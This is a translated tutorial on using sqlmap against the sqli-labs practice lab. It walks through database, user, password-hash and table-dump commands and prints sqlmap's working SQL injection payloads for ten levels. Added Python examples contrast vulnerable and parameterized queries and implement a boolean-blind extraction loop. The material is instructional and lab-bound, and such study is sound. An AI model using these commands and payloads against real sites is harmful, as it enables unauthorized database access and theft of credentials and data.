Before using it, here is a brief overview of what sqlmap can do.
The following is taken from:
Copyright notice: this is an original article by CSDN blogger "小明师傅", licensed under CC 4.0 BY-SA; reposts must include the original source link and this notice.
Original link: https://blog.csdn.net/qq_24030907/article/details/106541411
-
0. Clearing the sqlmap cache:
Option 1: delete the contents of the output directory, here C:\Users\dragoneyes\.sqlmap\output (sqlmap keeps its stored sessions and dumped data under the user's .sqlmap folder, so stale session data from an earlier run is resumed unless it is cleared)
Option 2: sqlmap.py --purge
-
1. Detecting the injection point
sqlmap -u <target URL>    tests whether the parameter is injectable
sqlmap -u <target URL> --batch    answers every prompt with its default, so the run needs no interaction
-
2. Enumerating databases and DBMS users
sqlmap -u <target URL> --dbs    // list all databases
The database the web application is currently using:
sqlmap -u <target URL> --current-db    // show the current database
The DBMS account the web application connects with:
sqlmap -u <target URL> --current-user    // show the current user
List all DBMS users (this works for any supported DBMS, not only SQL Server):
sqlmap -u <target URL> --users    // list all DBMS user accounts
-
3. Database account password hashes
sqlmap -u <target URL> --passwords    // dump the DBMS users' password hashes (for MySQL, from mysql.user); sqlmap then offers a dictionary attack on the hashes it retrieved
-
4. Listing the tables in a database
sqlmap -u <target URL> -D <database> --tables    // (-D selects the database)
-
5. Listing the columns of a table
sqlmap -u <target URL> -D <database> -T <table> --columns
-
6. Dumping column contents
sqlmap -u <target URL> -D <database> -T <table> -C "email,username,userpassword" --dump    (dumps the selected columns; the results are also written to the output directory)
--risk: risk level, range 1-3, default 1. Level 1 runs most of the test statements; 2 adds heavy time-based tests; 3 adds OR-based boolean tests, which can modify data if the injection lands inside an UPDATE or DELETE statement.
--level: range 1-5, default 1. Higher levels add more payloads and also test more parameters: from level 2 the Cookie header, from level 3 the User-Agent and Referer headers. When you are not sure which parameter or payload will work, use a higher level for coverage.
1. less01 - Error Based - String
This one is simple, so we can go straight to enumerating the databases at the highest level and risk:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbs
While it enumerates the databases, note that sqlmap prints the payloads it found to work. They are worth reading, because each one shows exactly how the injected input closes the original query's quoting (here a single-quoted string, hence the 1' prefix and the AND 'gZcP'='gZcP suffix that re-balances the quotes). The payloads are:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4225=4225 AND 'gZcP'='gZcP
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(5094=5094,1))),0x71626a7171,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'loNl'='loNl
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1656 FROM (SELECT(SLEEP(5)))rOKe) AND 'cthH'='cthH
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8083' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x424c456c79416b53754b79614463647857484654456b76454966544364767747446a737173444955,0x71626a7171),NULL-- -
---
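The four payloads above differ only in what they make the database do; all share the same job of closing the original query's quoting context. The following is an added example (not from the original post) that reproduces the quoting contexts of Less-1 (single-quoted string), Less-2 (bare integer) and Less-3 (string in parentheses) against an in-memory SQLite table with constructed sample rows, runs the boolean-based payloads printed on this page through both the vulnerable string-built query and a parameterized one, and decodes the hex literals in the error-based and UNION payloads, which are the random delimiter strings sqlmap uses to find its extracted data in the response. Table name, rows and function names are assumptions; MySQL-only functions (CONCAT, ELT, SLEEP) are not executed.

```python
import re
import sqlite3

# Added example, not part of the original post. Templates mirror the sqli-labs queries for
# the three quoting contexts; the users table and its two rows are constructed sample data.
TEMPLATES = {
    "Less-1": "SELECT id, username, password FROM users WHERE id='{}' LIMIT 1",
    "Less-2": "SELECT id, username, password FROM users WHERE id={} LIMIT 1",
    "Less-3": "SELECT id, username, password FROM users WHERE id=('{}') LIMIT 1",
}

# Payloads copied from the sqlmap output above (Less-1).
ERROR_PAYLOAD = ("id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,"
                 "(SELECT (ELT(5094=5094,1))),0x71626a7171,0x78))s), 8446744073709551610, "
                 "8446744073709551610))) AND 'loNl'='loNl")
UNION_PAYLOAD = ("id=-8083' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x424c456c79416b53754b79"
                 "614463647857484654456b76454966544364767747446a737173444955,0x71626a7171),NULL-- -")


def _db():
    """In-memory stand-in for the security.users table (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return con


def vulnerable_lookup(level, user_input):
    """Builds the query by string formatting, the flaw every lab level demonstrates.
    Returns the matching row or None. A payload whose prefix/suffix do not fit the
    context raises sqlite3.OperationalError instead, which is what sqlmap's
    heuristic phase is looking for when it tries each quoting pattern."""
    con = _db()
    return con.execute(TEMPLATES[level].format(user_input)).fetchone()


def safe_lookup(user_input):
    """Hardened form: the value is bound as a parameter, so quotes and AND clauses
    inside it remain data and never reach the SQL parser."""
    con = _db()
    return con.execute(
        "SELECT id, username, password FROM users WHERE id=? LIMIT 1",
        (user_input,),
    ).fetchone()


def decode_hex_markers(payload):
    """Decode every 0x... literal in a sqlmap payload. The first and last are the
    random delimiters (e.g. 0x7170627171 -> 'qpbqq') that sqlmap wraps around the
    extracted value so it can locate it in the HTML; in the UNION payload the middle
    one is a random probe string, in the error-based one it is the 0x78 ('x') tail
    that pads the value inside MySQL's 'BIGINT value is out of range' error text."""
    return [bytes.fromhex(h).decode("ascii") for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


if __name__ == "__main__":
    # Boolean-based blind payloads from the Less-1/2/3 output above, true and false branches.
    print(vulnerable_lookup("Less-1", "1' AND 4225=4225 AND 'gZcP'='gZcP"))
    print(vulnerable_lookup("Less-1", "1' AND 4225=4226 AND 'gZcP'='gZcP"))
    print(vulnerable_lookup("Less-2", "1 AND 6989=6989"))
    print(vulnerable_lookup("Less-3", "1') AND 5965=5965 AND ('Uhxh'='Uhxh"))
    print(safe_lookup("1' AND 4225=4225 AND 'gZcP'='gZcP"))  # parameterized: no row
    print(decode_hex_markers(ERROR_PAYLOAD), decode_hex_markers(UNION_PAYLOAD))
```

The Less-1 payload fed to `safe_lookup` returns nothing because the whole string is compared against the id column as one value; the same string fed to `vulnerable_lookup` returns the first row, and flipping 4225=4225 to 4225=4226 returns none, which is the single bit per request that boolean-based blind extraction is built on.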
Next come the usual steps, mirroring manual injection:
1.1 Show the current database
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --current-db
1.2 Enumerate the tables in the chosen database: --dbms=mysql -D "security" --tables
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" --tables
1.3 Enumerate the columns of the users table: -T "users" --columns (the command below uses the short form --col)
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" --col
1.4 Dump the chosen columns: -C "password,username" --dump
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump
As shown, the table's contents are fully exposed.
2. less02 - Error Based - Intiger
Similar to the first level; the injection points sqlmap reported are listed below. Note the bare id=1 prefix and the absence of a quote-closing suffix, because the parameter is an unquoted integer. The individual enumeration commands are not repeated.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6989=6989
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178626a71,(SELECT (ELT(6000=6000,1))),0x7162706271,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))XNPi)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3218 UNION ALL SELECT NULL,CONCAT(0x7178626a71,0x627549484c74714d6d63704b6c58725270757a6b644678537a7a714b6463415159534877596e796b,0x7162706271),NULL-- -
---
3. less03 - Error Based - String (with Twist)
Similar to the first level; the injection points sqlmap reported are listed below. The twist is the parenthesis around the string, so the payloads open with id=1') and close with AND ('...'='.... The individual enumeration commands are not repeated.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 5965=5965 AND ('Uhxh'='Uhxh
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a6a7a71,(SELECT (ELT(4276=4276,1))),0x7178787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('DhTF'='DhTF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 5032 FROM (SELECT(SLEEP(5)))ZpJN) AND ('qjGP'='qjGP
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8381') UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7a71,0x6244626e745745795371456665544570755652784f4c6256444c794f4e6a787a654e474f4b767255,0x7178787671)-- -
---
4. less04 - Error Based - DoubleQuotes String
Similar to the first level; the injection points sqlmap reported are listed below. Here the parameter sits in a double-quoted string inside parentheses, so the prefix becomes id=1") and the UNION payload ends with a # comment instead of a quote-balancing suffix. The individual enumeration commands are not repeated.
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1") AND 3072=3072#
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a6b7071,(SELECT (ELT(5205=5205,1))),0x716b626271,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("yfvD"="yfvD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1") AND (SELECT 3354 FROM (SELECT(SLEEP(5)))Cwyc) AND ("gvAz"="gvAz
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-8029") UNION ALL SELECT NULL,CONCAT(0x716a6b7071,0x724d544d6171674c56465a6c4c7247716677484e4851686a4e63676b456e587a464669414c765268,0x716b626271),NULL#
---
5. less05 - Double Query - Single Quotes - String
Similar to the first level; the injection points sqlmap reported are listed below. This level does not echo query results, so no UNION technique is found and sqlmap falls back to boolean-based, error-based and time-based methods. The individual enumeration commands are not repeated.
sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7188=7188 AND 'mqLE'='mqLE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707071,(SELECT (ELT(6541=6541,1))),0x7170707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'aJRC'='aJRC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8698 FROM (SELECT(SLEEP(5)))CBFA) AND 'fmva'='fmva
---
6. less06 - Double Query - Double Quotes - String
Similar to the first level; the injection points sqlmap reported are listed below. The individual enumeration commands are not repeated.
sqlmap identified the following injection point(s) with a total of 221 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 4582=4582#
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6b7071,(SELECT (ELT(8039=8039,1))),0x7178767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- uBIu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 8198 FROM (SELECT(SLEEP(5)))BnZi)-- XRBu
---
7. less07 - Dump into Outfile
Similar to the first level; the injection points sqlmap reported are listed below. Only boolean-based and time-based blind techniques were found here, which is why the run needed 287 requests. The individual enumeration commands are not repeated.
sqlmap identified the following injection point(s) with a total of 287 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 7606=7606 AND ('QcoM'='QcoM
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 3053 FROM (SELECT(SLEEP(5)))oLyk) AND ('rXXO'='rXXO
---
8. less08 - Blind - Boolian - Single Quotes - String
Similar to the first level; the injection points sqlmap reported are listed below. With no errors and no echoed output, sqlmap is limited to boolean-based and time-based blind techniques, and every character it dumps must be recovered through a series of true/false requests. The individual enumeration commands are not repeated.
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7494=7494 AND 'UORd'='UORd
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---
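The boolean-based blind point above only tells the attacker whether the page showed a row or not, so sqlmap recovers each character of a value by asking a series of comparison questions. The following is an added example (not from the original post) of that extraction loop, run against an in-memory SQLite table with a constructed row standing in for security.users, in Less-8's id='...' quoting context. It uses SQLite's unicode() and substr() where sqlmap's MySQL payloads use ORD() and SUBSTRING(); the oracle function, table and row are assumptions.

```python
import sqlite3

# Added example, not part of the original post. A boolean-blind character extractor of
# the kind sqlmap runs against Less-8, against a constructed in-memory table.
REQUESTS = {"n": 0}  # counts oracle queries, i.e. HTTP requests in a real run


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")  # constructed row
    return con


CON = _db()


def page_shows_row(user_input):
    """Boolean oracle: Less-8 prints 'You are in...' when the query returns a row and
    nothing otherwise. The query is built by string formatting, exactly like the lab."""
    REQUESTS["n"] += 1
    sql = "SELECT username FROM users WHERE id='{}' LIMIT 1".format(user_input)
    try:
        return CON.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def char_at(expr, pos):
    """Binary-search the code point (0-127) of character `pos` of the SQL expression
    `expr` through the oracle: 7 requests per character instead of up to 128.
    The payload keeps the single-quote context balanced with the AND 'a'='a suffix,
    the same shape as the 1' AND ... AND 'UORd'='UORd payload sqlmap printed above."""
    lo, hi = 0, 128  # invariant: lo <= code < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        payload = "1' AND (SELECT unicode(substr(({}),{},1)))>={} AND 'a'='a".format(expr, pos, mid)
        if page_shows_row(payload):
            lo = mid
        else:
            hi = mid
    return lo


def extract(expr, max_len=32):
    """Recover a string value one character at a time. Past the end of the string,
    substr() returns '' and unicode('') is NULL, so every comparison is false and
    char_at returns 0, which terminates the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        code = char_at(expr, pos)
        if code == 0:
            break
        out += chr(code)
    return out


if __name__ == "__main__":
    before = REQUESTS["n"]
    print(extract("SELECT username FROM users LIMIT 1"))
    print(REQUESTS["n"] - before, "requests")
```

For a four-character value this costs 35 oracle queries (7 per character plus 7 to detect the end), which is why blind levels take hundreds of requests where the UNION technique in Less-1 dumps a whole row in one; sqlmap's --threads option and its time-based variant (replace the comparison with IF(cond, SLEEP(5), 0)) trade the same bits against either concurrency or response time.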
9. less09 - Blind - Time based - Single Quotes - String
Similar to the first level; the injection points sqlmap reported are listed below. The individual enumeration commands are not repeated.
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4639=4639 AND 'PEyr'='PEyr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8651 FROM (SELECT(SLEEP(5)))TJGQ) AND 'wKXs'='wKXs
---
10. less10 - Blind - Time based - Double Quotes - String
Similar to the first level; the individual enumeration commands are not repeated.
When enumerating here, the level and risk need to be raised, as follows:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-8/?id=1" --current-db --level=5 --risk=3
Note that this command targets Less-8 rather than Less-10, and the session output below is the stored Less-8 result (identical to the Less-8 payloads above, with single-quote prefixes). A genuine Less-10 result would use double-quote prefixes of the id=1" form, matching the level's title. The injection points sqlmap resumed are:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7494=7494 AND 'UORd'='UORd
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---